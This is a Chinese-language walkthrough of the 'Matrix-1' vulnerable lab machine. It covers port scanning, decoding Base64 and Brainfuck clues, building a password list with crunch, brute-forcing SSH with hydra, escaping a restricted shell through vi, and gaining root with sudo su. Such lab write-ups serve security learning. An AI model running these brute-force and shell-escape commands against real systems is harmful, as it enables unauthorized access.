Matrix-1
青 叶

Matrix-1

基础信息收集

NMAP Result:

image

Nikto未披露有效信息,dirb也未提供有效信息。

在80端口的HTTP服务未发现有效信息:

image

在31337端口发现一串Base64密文:

image

解码后:

image

访问:

1
http://192.168.145.143:31337/Cypher.matrix

打开是这样的:

image

熟悉的BrainFuck编码,解码得:

You can enter into matrix as guest, with password k1ll0rXX

Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

密码爆破

按照提示,用crunch生成一下字典:

1
crunch 8 8 -f /usr/share/crunch/charset.lst mixalpha-numeric -t k1ll0r@@ >> pwd_list

然后hydra爆破:

1
hydra -l guest -P pwd_list ssh://192.168.145.143 -t 64

image

RBASH逃逸

image

登陆上后是显示rbash,export看一下环境变量:

image

由于ls用不了,不过可以骚操作用echo代替一下:

1
echo /home/guest/prog/*

image

嗯?有Vi?直接逃逸!

Vi内命令执行:

image

成功:

image

导入一下环境变量:

1
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

提权

看一下有无系统内核提权,搜了一下并无。

image

sudo权限检查一下:

image

???

???

???

我直接好家伙,提权直接su就好了:

image

。。。

emmm,这个靶机有点太简单了。。。